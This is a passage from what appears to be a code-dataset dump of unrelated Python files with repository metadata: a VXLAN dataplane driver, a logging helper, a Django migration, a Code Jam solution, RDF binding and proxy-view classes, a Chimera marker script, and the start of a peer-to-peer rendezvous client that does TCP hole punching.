def addDataplaneForBroadcastEndpoint(self, remotePE, label, nlri, encaps):
if self._cleaningUp:
self.log.debug("setupDataplaneForRemoteEndpoint: instance cleaning"
" up, do nothing")
return
vni = label
# 00:00:00:00:00 usable as default since kernel commit
# 58e4c767046a35f11a55af6ce946054ddf4a8580 (2013-06-25)
self._runCommand("bridge fdb append 00:00:00:00:00:00 dev %s dst %s "
"vni %s" % (self.vxlan_if_name, remotePE, vni))
self._fdbDump()
@logDecorator.log
def removeDataplaneForBroadcastEndpoint(self, remotePE, label, nlri):
if self._cleaningUp:
self.log.debug("setupDataplaneForRemoteEndpoint: instance cleaning"
" up, do nothing")
return
vni = label
self._fdbDump()
self._runCommand("bridge fdb delete 00:00:00:00:00:00 dev %s dst %s "
"vni %s" % (self.vxlan_if_name, remotePE, vni))
self._fdbDump()
def _fdbDump(self):
if self.log.debug:
self.log.debug("bridge fdb dump: %s", self._runCommand(
"bridge fdb show dev %s" % self.vxlan_if_name)[0])
# Looking glass ####
def getLookingGlassLocalInfo(self, pathPrefix):
return {
"linux_bridge": self.bridge_name,
"vxlan_if": self.vxlan_if_name
}
class LinuxVXLANDataplaneDriver(DataplaneDriver):
    """
    E-VPN Dataplane driver relying on the Linux kernel linuxbridge
    VXLAN implementation.
    """

    dataplaneInstanceClass = LinuxVXLANEVIDataplane
    requiredKernel = "3.11.0"
    encaps = [Encapsulation(Encapsulation.VXLAN)]

    def __init__(self, config, init=True):
        """Parse driver config ('vxlan_dst_port') and init the base driver."""
        LookingGlassLocalLogger.__init__(self, __name__)
        self.log.info("Initializing %s", self.__class__.__name__)
        try:
            # 0 / absent means "use the kernel default destination port".
            self.vxlanDestPort = int(config.get("vxlan_dst_port", 0)) or None
        except ValueError:
            raise Exception("Could not parse specified vxlan_dst_port: %s" %
                            config["vxlan_dst_port"])
        DataplaneDriver.__init__(self, config, init)

    def _initReal(self, config):
        """Warn on kernels older than requiredKernel and load the vxlan
        module."""
        self.config = config
        self.log.info("Really initializing %s", self.__class__.__name__)
        o = self._runCommand("uname -r")
        kernelRelease = o[0][0].split("-")[0]
        if (StrictVersion(kernelRelease) <
                StrictVersion(LinuxVXLANDataplaneDriver.requiredKernel)):
            # Lazy %-style args, consistent with the other log calls in
            # this module (the original formatted eagerly with '%').
            self.log.warning("%s requires at least Linux kernel %s (you are"
                             " running %s)",
                             self.__class__.__name__,
                             LinuxVXLANDataplaneDriver.requiredKernel,
                             kernelRelease)
        self._runCommand("modprobe vxlan")

    def resetState(self):
        """Delete every EVPN bridge and VXLAN interface matching our
        naming prefixes (leftovers from a previous run)."""
        self.log.debug("Resetting %s dataplane", self.__class__.__name__)
        # delete all EVPN bridges
        cmd = "brctl show | tail -n +2 | awk '{print $1}'| grep '%s'"
        for bridge in self._runCommand(cmd % BRIDGE_NAME_PREFIX,
                                       raiseExceptionOnError=False,
                                       acceptableReturnCodes=[0, 1])[0]:
            self._runCommand("ip link set %s down" % bridge)
            self._runCommand("brctl delbr %s" % bridge)
        # delete all VXLAN interfaces
        cmd = "ip link show | awk '{print $2}' | tr -d ':' | grep '%s'"
        for interface in self._runCommand(cmd % VXLAN_INTERFACE_PREFIX,
                                          raiseExceptionOnError=False,
                                          acceptableReturnCodes=[0, 1])[0]:
            self._runCommand("ip link set %s down" % interface)
            self._runCommand("ip link delete %s" % interface)

    def _cleanupReal(self):
        # FIXME: need to refine what would be different
        self.resetState()

    def _runCommand(self, command, *args, **kwargs):
        """Run a shell command through the shared runCommand helper."""
        return runCommand(self.log, command, *args, **kwargs)
| [
"thomas.morin@orange.com"
] | thomas.morin@orange.com |
b62869b2ea9ec7ee576a4f420b28e4a11c073e56 | 82319ec6aaf462f6823f43946a7f4a0624bffa20 | /Mariana/candies.py | 0cf5f3dbec3776bc67771d2ceb5bca91f91c772a | [
"Apache-2.0"
] | permissive | enterstudio/Mariana | b76a382f5873f9bf83837e9f5190ab6684e14972 | 6b186d93c5fe5521603a389e975595e45e1ea5d2 | refs/heads/master | 2021-04-29T04:30:21.627507 | 2017-11-21T16:30:55 | 2017-11-21T16:30:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,294 | py | import sys, time
import Mariana.settings as MSET
MESSAGE_LOG_FILE = None
def friendly(msgSubject, msg, warning=False, flush = True) :
	"""Prints a friendly message to stdout and, when enabled in settings,
	appends it to the shared message log file.

	msgSubject -- short subject line for the message
	msg        -- message body (newlines are re-indented under the subject)
	warning    -- if True, prefix the subject with "WARNING: "
	flush      -- if True, flush stdout / the log file after writing
	"""
	# Lazily-opened, module-level log file handle shared with fatal().
	global MESSAGE_LOG_FILE
	# Indent the body so it lines up under the subject line.
	m = " " + msg.replace("\n", '\n ')
	if warning :
		subject = "WARNING: " + msgSubject
	else :
		subject = msgSubject
	s = """\n%s:\n%s\n%s\n\n Cheers :),\n\n Mariana\n""" %(subject, "-"*(len(subject) + 1), m)
	# NOTE: Python 2 print statement -- this module targets Python 2.
	if MSET.VERBOSE :
		print s
		if flush :
			sys.stdout.flush()
	if MSET.SAVE_MESSAGE_LOG :
		if not MESSAGE_LOG_FILE :
			# First use: open the configured log file for writing.
			MESSAGE_LOG_FILE = open(MSET.SAVE_MESSAGE_LOG_FILE, "w")
		MESSAGE_LOG_FILE.write("\ntimestamp:%s, human time:%s\n%s" % (time.time(), time.ctime(), s))
		if flush :
			MESSAGE_LOG_FILE.flush()
def fatal(msgSubject, msg, toRaise = ValueError, flush = True) :
	"""Death is upon us: log a fatal message (when enabled) and raise
	*toRaise*.

	msgSubject -- short subject line for the message
	msg        -- message body (newlines are re-indented)
	toRaise    -- exception to raise after logging (default ValueError)
	flush      -- if True, flush the log file after writing
	"""
	# Lazily-opened, module-level log file handle shared with friendly().
	global MESSAGE_LOG_FILE
	m = " " + msg.replace("\n", '\n ')
	subject = msgSubject
	# NOTE(review): 'toRaise.message' assumes a Python 2 exception with a
	# .message attribute -- verify what callers actually pass here.
	s = """\n%s:\n%s\n%s\n\n %s\nSorry,\n\n Mariana\n""" %(subject, "-"*(len(subject) + 1), m, toRaise.message)
	if MSET.SAVE_MESSAGE_LOG :
		if not MESSAGE_LOG_FILE :
			# First use: open the configured log file for writing.
			MESSAGE_LOG_FILE = open(MSET.SAVE_MESSAGE_LOG_FILE, "w")
		MESSAGE_LOG_FILE.write("\ntimestamp:%s, human time:%s\n%s" % (time.time(), time.ctime(), s))
		if flush :
			MESSAGE_LOG_FILE.flush()
	raise toRaise
"tariq.daouda@umontreal.ca"
] | tariq.daouda@umontreal.ca |
3d176dce7202f238b832138d2285f99c932b6cae | 3d7860f969ee69585b476fb22ff2ee1cff587eab | /src/inventory/migrations/0003_auto_20180123_1811.py | 56cdec16960d437cfa3a33d52bc9d1ce1df42bb9 | [] | no_license | niketanmoon/inventory1 | c8778c89eb641dd35d75589c3ffb8d8c200eec34 | 7cb204c5ee5519c89bced51e55675f9d0f3475b0 | refs/heads/master | 2022-10-19T01:31:37.915746 | 2018-01-24T09:32:25 | 2018-01-24T09:32:25 | 118,739,027 | 0 | 1 | null | 2022-10-11T05:56:48 | 2018-01-24T08:56:48 | Python | UTF-8 | Python | false | false | 707 | py | # Generated by Django 2.0.1 on 2018-01-23 12:41
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.0.1 on 2018-01-23: relaxes the three
    # date columns on the 'computer' model to accept NULL.

    dependencies = [
        ('inventory', '0002_auto_20180117_1255'),
    ]

    operations = [
        # Allow records with no acquisition date.
        migrations.AlterField(
            model_name='computer',
            name='Acquisitiondate',
            field=models.DateField(null=True),
        ),
        # Allow records with no purchase date.
        migrations.AlterField(
            model_name='computer',
            name='Purchasedate',
            field=models.DateField(null=True),
        ),
        # Allow records with no return date.
        migrations.AlterField(
            model_name='computer',
            name='Returndate',
            field=models.DateField(null=True),
        ),
    ]
| [
"niketanmoon@gmail.com"
] | niketanmoon@gmail.com |
4a598d2367df91c2132f36ba1260a08e69c2849f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_156/405.py | aeb8d5ee9d8ab943436dd2561792b7b36aab3233 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | for j in range(int(raw_input())):
I = int(raw_input())
A = list(map(int, raw_input().split(" ")))
result = max(A)
Z = 2
while Z < result:
result = min(result, sum([(x - 1) // Z for x in A]) + Z)
Z += 1
print 'Case #%d: %s' % (j + 1, result) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
2066d3c55c24d18937568e13c5eed223311a3637 | 7876cdf2db81f57998578823f677536e85691075 | /jsongraph/binding.py | e269afb396a71490c93d62c230d23fdd84b24a4d | [
"MIT"
] | permissive | backgroundcheck/jsongraph | fe43b2d1bd3c762639614e513cd727bc93a89a0c | 35e4f397dbe69cd5553cf9cb9ab98859c3620f03 | refs/heads/master | 2021-01-17T11:43:40.447531 | 2015-10-02T13:20:53 | 2015-10-02T13:20:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | from rdflib import Literal, URIRef
# from rdflib.term import Identifier
# from rdflib.namespace import RDF
from jsonmapping import SchemaVisitor
from jsongraph.util import is_url, safe_uriref
from jsongraph.vocab import BNode, PRED, ID
class Binding(SchemaVisitor):
    """Bind a JSON schema node to its RDF representation, exposing the
    subject, predicate and object for graph conversion."""

    @property
    def uri(self):
        """The schema path as a URIRef, or None when absent."""
        val = self.path
        return None if val is None else URIRef(val)

    @property
    def subject(self):
        """RDF subject for this node.

        Uses the property named by 'rdfSubject' (default: 'id'); falls
        back to a fresh blank node when no such property yields a value.
        The result is memoized on the instance.
        """
        if not hasattr(self, '_rdf_subject'):
            self._rdf_subject = None
            subject = self.schema.get('rdfSubject', 'id')
            for prop in self.properties:
                if prop.match(subject):
                    obj = prop.object
                    # Mint an ID-namespace URI for plain (non-URI) values.
                    if obj is not None and not isinstance(obj, URIRef):
                        obj = ID[obj]
                    self._rdf_subject = obj
                    break
            if self._rdf_subject is None:
                self._rdf_subject = BNode()
        return self._rdf_subject

    @property
    def predicate(self):
        """Predicate URI, taken from 'rdfName' or the node name."""
        return PRED[self.schema.get('rdfName', self.name)]

    @property
    def reverse(self):
        """Reverse predicate ('rdfReverse'), inherited from an array
        parent when not set locally; None otherwise."""
        name = self.schema.get('rdfReverse')
        if name is not None:
            return PRED[name]
        if self.parent is not None and self.parent.is_array:
            return self.parent.reverse

    def get_property(self, predicate):
        """Return the child property matching 'predicate', else None."""
        for prop in self.properties:
            if predicate == PRED[prop.name]:
                return prop

    @property
    def object(self):
        """RDF object for this node's data: a URIRef, an ID-namespace
        URI, or a plain Literal."""
        if self.data is None:
            return self.data
        if self.schema.get('format') == 'uri' or \
                self.schema.get('rdfType') == 'uri':
            # Narrowed from a bare 'except:' so KeyboardInterrupt and
            # SystemExit are no longer swallowed.
            try:
                return safe_uriref(self.data)
            except Exception:
                # Not a valid URI: fall through to other representations.
                pass
        if self.schema.get('rdfType') == 'id':
            if is_url(self.data):
                try:
                    return safe_uriref(self.data)
                except Exception:
                    # Invalid URL: mint an ID-namespace URI instead.
                    pass
            return ID[self.data]
        return Literal(self.data)
| [
"friedrich@pudo.org"
] | friedrich@pudo.org |
5bb04a05fca219f33e78261c8eabe59102d646b5 | fb82fdf706863465b1f357cd1fa0447474cd8a70 | /ServerComponent/venv/Lib/site-packages/rsrc/framework/view.py | 33c4500d6b89d88f27d05dc9d26bfb47d98bb8b9 | [
"MIT"
] | permissive | CDU55/FakeNews | d79e2a069b3f1392f779d5b2256cd54c696e789a | 707bd48dd78851081d98ad21bbdadfc2720bd644 | refs/heads/main | 2023-02-20T06:27:18.618837 | 2021-01-17T15:14:27 | 2021-01-17T15:14:27 | 305,167,221 | 0 | 1 | MIT | 2020-12-07T19:51:46 | 2020-10-18T18:16:49 | Python | UTF-8 | Python | false | false | 2,331 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
import functools
from rsrc import Request
def response(method):
    """Decorator for proxy-view handlers: serialize the wrapped view's
    response data to JSON and hand it to ``self.make_response``."""
    @functools.wraps(method)
    def wrapper(self, *args, **kwargs):
        resp = method(self, *args, **kwargs)
        # Serialize the body and advertise the JSON content type.
        body = json.dumps(resp.data)
        resp.headers.update({'Content-Type': 'application/json'})
        return self.make_response(body, resp.status, resp.headers)
    return wrapper
class ProxyView(object):
    """Delegate requests from framework-view to resource-view.

    Subclasses of `ProxyView` should set the `view` attribute, and override
    the following methods:

        get_uri
        get_query_params
        get_auth_params
        get_data
        make_response
    """

    def get_uri(self, request):
        """Return the request URI; must be overridden."""
        raise NotImplementedError()

    def get_query_params(self, request):
        """Return the query parameters; must be overridden."""
        raise NotImplementedError()

    def get_auth_params(self, request):
        """Return the authentication parameters; must be overridden."""
        raise NotImplementedError()

    def get_data(self, request):
        """Return the request body data; must be overridden."""
        raise NotImplementedError()

    def make_response(self, data, status, headers):
        """Build a framework-specific response; must be overridden."""
        raise NotImplementedError()

    def make_request(self, raw_request):
        """Translate a framework request into a framework-agnostic
        Request object."""
        request = Request(
            scheme=raw_request.scheme,
            uri=self.get_uri(raw_request),
            method=raw_request.method,
            data=self.get_data(raw_request),
            query_params=self.get_query_params(raw_request),
            kwargs=dict(auth=self.get_auth_params(raw_request))
        )
        return request

    @response
    def options(self, request, **kwargs):
        return self.view.options_proxy(self.make_request(request), **kwargs)

    @response
    def get(self, request, **kwargs):
        return self.view.get_proxy(self.make_request(request), **kwargs)

    @response
    def post(self, request, **kwargs):
        # Bug fix: **kwargs used to be passed to make_request() instead
        # of post_proxy(), unlike every other HTTP method handler here.
        return self.view.post_proxy(self.make_request(request), **kwargs)

    @response
    def put(self, request, **kwargs):
        return self.view.put_proxy(self.make_request(request), **kwargs)

    @response
    def patch(self, request, **kwargs):
        return self.view.patch_proxy(self.make_request(request), **kwargs)

    @response
    def delete(self, request, **kwargs):
        return self.view.delete_proxy(self.make_request(request), **kwargs)
| [
"48147775+BiancaChirica@users.noreply.github.com"
] | 48147775+BiancaChirica@users.noreply.github.com |
f49f3f5b667f54e765d0a80a7fa5d26295c46453 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_29256.py | 924ec987143f729b08f0842e3acfffa9bd2a048a | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,832 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
# Marker definitions: (marker set name, (x, y, z), RGB color, radius).
# This data table replaces the original long run of copy-pasted
# if-blocks; behavior is identical (same sets, same placement order).
_MARKERS = [
    ("Cog2_GFPN", (518.552, 629.65, 574.573), (0.89, 0.1, 0.1), 18.4716),
    ("Cog2_0", (507.239, 570.145, 540.664), (0.89, 0.1, 0.1), 17.1475),
    ("Cog2_1", (503.348, 500.265, 498.21), (0.89, 0.1, 0.1), 17.1475),
    ("Cog2_GFPC", (626.574, 556.372, 531.081), (0.89, 0.1, 0.1), 18.4716),
    ("Cog2_Anch", (448.028, 337.515, 409.475), (0.89, 0.1, 0.1), 18.4716),
    ("Cog3_GFPN", (510.303, 594.831, 545.061), (1, 1, 0), 18.4716),
    ("Cog3_0", (510.243, 596.297, 545.021), (1, 1, 0.2), 17.1475),
    ("Cog3_1", (497.807, 602.075, 520.851), (1, 1, 0.2), 17.1475),
    ("Cog3_2", (481.973, 607.464, 498.315), (1, 1, 0.2), 17.1475),
    ("Cog3_3", (481.818, 617.559, 472.34), (1, 1, 0.2), 17.1475),
    ("Cog3_4", (500.365, 632.946, 458.161), (1, 1, 0.2), 17.1475),
    ("Cog3_5", (516.893, 651.345, 471.624), (1, 1, 0.2), 17.1475),
    ("Cog3_GFPC", (502.922, 608.574, 568.927), (1, 1, 0.4), 18.4716),
    ("Cog3_Anch", (523.23, 696.873, 375.944), (1, 1, 0.4), 18.4716),
    ("Cog4_GFPN", (455.251, 509.78, 340.901), (0, 0, 0.8), 18.4716),
    ("Cog4_0", (455.251, 509.78, 340.901), (0, 0, 0.8), 17.1475),
    ("Cog4_1", (463.341, 517.85, 367.84), (0, 0, 0.8), 17.1475),
    ("Cog4_2", (470.336, 526.879, 394.8), (0, 0, 0.8), 17.1475),
    ("Cog4_3", (480.969, 537.773, 419.792), (0, 0, 0.8), 17.1475),
    ("Cog4_4", (491.986, 549.453, 444), (0, 0, 0.8), 17.1475),
    ("Cog4_5", (497.563, 558.35, 471.103), (0, 0, 0.8), 17.1475),
    ("Cog4_6", (484.289, 562.239, 496.639), (0, 0, 0.8), 17.1475),
    ("Cog4_GFPC", (539.957, 603.04, 248.392), (0, 0, 0.8), 18.4716),
    ("Cog4_Anch", (422.412, 529.415, 747.31), (0, 0, 0.8), 18.4716),
    ("Cog5_GFPN", (462.708, 525.179, 502.959), (0.3, 0.3, 0.3), 18.4716),
    ("Cog5_0", (462.708, 525.179, 502.959), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_1", (486.037, 520.168, 519.143), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_2", (508.272, 504.644, 529.967), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_3", (533.369, 501.183, 515.225), (0.3, 0.3, 0.3), 17.1475),
    ("Cog5_GFPC", (567.852, 599.712, 583.659), (0.3, 0.3, 0.3), 18.4716),
    ("Cog5_Anch", (505.878, 403.164, 442.652), (0.3, 0.3, 0.3), 18.4716),
    ("Cog6_GFPN", (532.558, 573.259, 553.322), (0.21, 0.49, 0.72), 18.4716),
    ("Cog6_0", (532.692, 573.257, 553.382), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_1", (557.884, 585.48, 555.932), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_2", (561.44, 602.363, 533.753), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_3", (545.685, 618.369, 516.722), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_4", (529.45, 637.64, 504.131), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_5", (503.898, 649.46, 504.024), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_6", (485.653, 651.972, 482.457), (0.21, 0.49, 0.72), 17.1475),
    ("Cog6_GFPC", (437.984, 596.805, 527.398), (0.21, 0.49, 0.72), 18.4716),
    ("Cog6_Anch", (535.785, 704.79, 433.897), (0.21, 0.49, 0.72), 18.4716),
    ("Cog7_GFPN", (445.351, 559.719, 553.907), (0.7, 0.7, 0.7), 18.4716),
    ("Cog7_0", (470.355, 551.697, 549.464), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_1", (523.556, 532.863, 537.835), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_2", (575.373, 510.886, 525.488), (0.7, 0.7, 0.7), 17.1475),
    ("Cog7_GFPC", (592.253, 541.985, 598.089), (0.7, 0.7, 0.7), 18.4716),
    ("Cog7_Anch", (632.387, 458.157, 455.836), (0.7, 0.7, 0.7), 18.4716),
    ("Cog8_0", (521, 599.409, 587.095), (1, 0.5, 0), 17.1475),
    ("Cog8_1", (517.239, 571.446, 583.875), (1, 0.5, 0), 17.1475),
    ("Cog8_2", (512.382, 544.641, 575.086), (1, 0.5, 0), 17.1475),
    ("Cog8_3", (505.818, 517.977, 566.637), (1, 0.5, 0), 17.1475),
    ("Cog8_4", (497.866, 491.326, 559.67), (1, 0.5, 0), 17.1475),
    ("Cog8_5", (492.895, 468.822, 542.811), (1, 0.5, 0), 17.1475),
    ("Cog8_GFPC", (494.272, 547.923, 557.013), (1, 0.6, 0.1), 18.4716),
    ("Cog8_Anch", (491.083, 388.156, 526.611), (1, 0.6, 0.1), 18.4716),
]

# Create (or reuse) each named marker set and place its marker.
for _name, _xyz, _color, _radius in _MARKERS:
    if _name not in marker_sets:
        marker_sets[_name] = new_marker_set(_name)
    s = marker_sets[_name]
    mark = s.place_marker(_xyz, _color, _radius)

for k in surf_sets.keys():
    chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
be8697cb49a18120c3513f680f36a42111d156ed | e21e7623d99312dc8a4c0eedc0febb22d24c7918 | /venv/lib/python3.8/site-packages/pyp2p/rendezvous_client.py | eee0fb064138eecdbbc7dc7e63861d063e5a2c91 | [] | no_license | axelonet/E-voting-system-on-blockchain | 49aa9b2b45f75e85ed9de4d113849c1f3d95dd1d | 2651bab50f29a2b68ad17b2d2240279af2f24419 | refs/heads/master | 2023-01-04T04:03:44.817356 | 2020-04-15T06:06:36 | 2020-04-15T06:06:36 | 255,822,230 | 1 | 0 | null | 2020-10-25T11:52:19 | 2020-04-15T06:12:39 | null | UTF-8 | Python | false | false | 29,185 | py | """
This module handles all the operations required to bootstrap
the peer-to-peer network. It includes a custom client for
talking to the Rendezvous Server allowing the program to
accept and request connections with simultaneous and passive
nodes.
* A passive node is a node which can receive inbound connections.
* A simultaneous node is a node that cannot receive inbound
connections but its NAT uses predictable mapping so it can
receive connections through TCP hole punching.
* A simultaneous node seeking to initiate hole punching I
refer to as an "active simultaneous node."
* A simultaneous node which has already bootstrapped
becomes a "passive simultaneous node" whose purpose it
is to accept challenges from active simultaneous nodes
until its inbound slots are full.
* All other nodes are active nodes. Leechers who can only make
connections and take up valuable slots in the network.
The only special thing about this module is the TCP hole
punching algorithm, also known as TCP simultaneous open - it
works by timing two connections to occur simultaneously so that
their SYN 3-way handshakes cross over in such a way that their
TCP state machines consider the connection open. To do this,
you predict the NAT's remote mapping for the port and arrange
for both nodes to connect to each other's predicted port
simultaneously.
Todo:
* Add better exception handling and tests.
"""
import gc
import logging
from threading import Thread
import psutil
from .lib import *
from .sock import *
# Debug logging.
logging.basicConfig()
log = logging.getLogger(__name__)
class RendezvousClient:
def __init__(self, nat_type, rendezvous_servers, interface="default",
sys_clock=None):
self.nat_type = nat_type
self.delta = 0
self.port_collisions = 1
self.nat_tests = 5
self.server_con = None
self.mappings = None
self.predictions = None
self.simultaneous_cons = []
self.ntp = 0
self.mapping_no = 4
self.rendezvous_servers = rendezvous_servers
self.interface = interface
self.ntp_delay = 6
self.timeout = 5 # Socket timeout.
self.predictable_nats = ["preserving", "delta"]
self.sys_clock = sys_clock
def server_connect(self, sock=None, index=None, servers=None):
# Get server index if appropriate.
servers = servers or self.rendezvous_servers[:]
if index is not None:
servers = [
servers[index]
]
for server in servers:
log.debug("Trying server:" + str(server))
try:
# Blank socket object.
con = Sock(
blocking=1,
interface=self.interface,
timeout=2
)
# Pre-bound socket.
if sock is not None:
con.set_sock(sock)
# Connect the socket.
con.connect(server["addr"], server["port"])
log.debug("server con made")
# Return Sock object.
return con
except socket.error as e:
log.debug("Error in server_connect: " + str(e))
continue
raise Exception("All rendezvous servers are down.")
# Delete any old rendezvous server state for node.
def leave_fight(self):
con = self.server_connect()
con.send_line("CLEAR")
con.close()
return 1
def add_listen_sock(self, mappings):
new_mappings = []
for mapping in mappings:
# Create the listen socket.
s = socket.socket(
socket.AF_INET,
socket.SOCK_STREAM
)
# Reuse existing local bind details.
for sock in [mapping["sock"], s]:
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_REUSEADDR,
1
)
# Bind to existing local port.
s.bind(mapping["sock"].getsockname())
# Start listening for connections.
s.listen(5)
# Reecord details.
mapping["listen"] = s
new_mappings.append(mapping)
return new_mappings
    def attend_fight(self, mappings, node_ip, predictions, ntp):
        """
        This function is for starting and managing a fight
        once the details are known. It also handles the
        task of returning any valid connections (if any) that
        may be returned from threads in the simultaneous_fight function.

        mappings -- local port mappings (dicts carrying a "sock" key).
        node_ip -- IP of the peer to hole punch towards.
        predictions -- space-separated predicted remote ports (str).
        ntp -- synchronized time at which both sides should connect.
        Returns an open Sock on success, otherwise None.
        """
        # Bind listen server socket.
        mappings = self.add_listen_sock(mappings)
        log.debug(mappings)
        # Walk to fight: simultaneous_fight fills self.simultaneous_cons
        # from its worker threads.
        self.simultaneous_cons = []
        predictions = predictions.split(" ")
        self.simultaneous_fight(mappings, node_ip, predictions, ntp)
        # Return hole made in opponent.
        if len(self.simultaneous_cons):
            """
            There may be a problem here. I noticed that when these lines
            were removed during testing that connections tended to
            succeed more. There may be a lack of synchronization between
            the timing for connections to succeed so that a close on
            one side of the fight ends up ruining valid connections on
            this side. Will need to test more.
            Notes: the UNL synchronization code could actually fix
            this (potential) problem as a cool unintended side-effect.
            """
            # Close unneeded holes.
            """
            for i in range(1, len(self.simultaneous_cons)):
                try:
                    print("Closing unneeded hole")
                    #self.simultaneous_cons[i].s.close()
                except:
                    pass
            """
            try:
                # Return open hole.
                return self.simultaneous_cons[0]
            except:
                # Try accept a connection.
                # NOTE(review): indexing [0] after the len() check above
                # shouldn't normally raise -- confirm what this except
                # path is really guarding against.
                log.debug("No holes found")
                for mapping in mappings:
                    # Check if there's a new con (non-blocking select).
                    s = mapping["listen"]
                    r, w, e = select.select(
                        [s],
                        [],
                        [],
                        0
                    )
                    # Find socket.
                    for found_sock in r:
                        # Not us.
                        if found_sock != s:
                            continue
                        # Accept a new con from the listen queue.
                        log.debug("Accept logic works!")
                        client, address = s.accept()
                        con = Sock(blocking=0)
                        con.set_sock(client)
                        return con
        # No hole punched and nothing to accept.
        return None
    def sequential_connect(self):
        """
        Sequential connect is designed to return a connection to the
        Rendezvous Server but it does so in a way that the local port
        ranges (both for the server and used for subsequent hole
        punching) are allocated sequentially and predictably. This is
        because Delta+1 type NATs only preserve the delta value when
        the source ports increase by one.

        :return: [con, mappings, predictions] on success, None on any
                 failure (bind error, server unreachable, bad reply).
        """
        # Connect to rendezvous server.
        try:
            mappings = sequential_bind(self.mapping_no + 1, self.interface)
            con = self.server_connect(mappings[0]["sock"])
        except Exception as e:
            log.debug(e)
            log.debug("this err")
            return None
        # First mapping is used to talk to server.
        mappings.remove(mappings[0])
        # Receive port mapping.
        msg = "SOURCE TCP %s" % (str(mappings[0]["source"]))
        con.send_line(msg)
        reply = con.recv_line(timeout=2)
        remote_port = self.parse_remote_port(reply)
        if not remote_port:
            return None
        # Generate port predictions.
        # "1337" is a placeholder sent when the NAT is unpredictable
        # (random); real predictions are space-separated port numbers.
        predictions = ""
        if self.nat_type != "random":
            mappings = self.predict_mappings(mappings)
            for mapping in mappings:
                predictions += str(mapping["remote"]) + " "
            predictions = predictions.rstrip()
        else:
            predictions = "1337"
        return [con, mappings, predictions]
    def simultaneous_listen(self):
        """
        This function is called by passive simultaneous nodes who
        wish to establish themself as such. It sets up a connection
        to the Rendezvous Server to monitor for new hole punching requests.

        :return: 1 on success, 0 on failure.
        """
        # Close socket.
        if self.server_con is not None:
            self.server_con.s.close()
            self.server_con = None
        # Reset predictions + mappings.
        self.mappings = None
        self.predictions = None
        # Connect to rendezvous server.
        parts = self.sequential_connect()
        if parts is None:
            return 0
        con, mappings, predictions = parts
        # Switch the server connection to fully non-blocking so it can
        # be polled for challenge notifications.
        con.blocking = 0
        con.timeout = 0
        con.s.settimeout(0)
        self.server_con = con
        self.mappings = mappings
        self.predictions = predictions
        # Register simultaneous node with server.
        msg = "SIMULTANEOUS READY 0 0"
        ret = self.server_con.send_line(msg)
        if not ret:
            return 0
        return 1
def passive_listen(self, port, max_inbound=10):
try:
con = self.server_connect()
msg = "PASSIVE READY %s %s" % (str(port), str(max_inbound))
con.send_line(msg)
con.close()
return 1
except:
return 0
def predict_mappings(self, mappings):
"""
This function is used to predict the remote ports that a NAT
will map a local connection to. It requires the NAT type to
be determined before use. Current support for preserving and
delta type mapping behaviour.
"""
if self.nat_type not in self.predictable_nats:
msg = "Can't predict mappings for non-predictable NAT type."
raise Exception(msg)
for mapping in mappings:
mapping["bound"] = mapping["sock"].getsockname()[1]
if self.nat_type == "preserving":
mapping["remote"] = mapping["source"]
if self.nat_type == "delta":
max_port = 65535
mapping["remote"] = int(mapping["source"]) + self.delta
# Overflow or underflow = wrap port around.
if mapping["remote"] > max_port:
mapping["remote"] -= max_port
if mapping["remote"] < 0:
mapping["remote"] = max_port - -mapping["remote"]
# Unknown error.
if mapping["remote"] < 1 or mapping["remote"] > max_port:
mapping["remote"] = 1
mapping["remote"] = str(mapping["remote"])
return mappings
    def throw_punch(self, args, tries=1):
        """
        Attempt to open a hole by TCP hole punching. This
        function is called by the simultaneous fight function
        and its the code that handles doing the actual hole
        punching / connecting.

        :param args: [sock, node_ip, remote_port] — a pre-bound socket,
                     the opponent's IP and the predicted remote port.
        :param tries: number of connection attempts (raised to 20 for
                      private/LAN addresses, see below).
        :return: 1 if a hole was opened (also appended to
                 self.simultaneous_cons), otherwise 0.
        """
        # Parse arguments.
        if len(args) != 3:
            return 0
        sock, node_ip, remote_port = args
        if sock is None or node_ip is None or remote_port is None:
            return 0
        # Generous timeout.
        con = Sock(blocking=1, interface=self.interface)
        con.set_sock(sock)
        local = 0
        if is_ip_private(node_ip):
            """
            When simulating nodes on the same computer a delay needs to be set
            for the loop back interface to simulate the delays that occur over
            a WAN link. This requirement may also be needed for nodes on a LAN.
            sudo tc qdisc replace dev lo root handle 1:0 netem delay 0.5sec
            Speculation: The simulation problem may be to do with CPU cores.
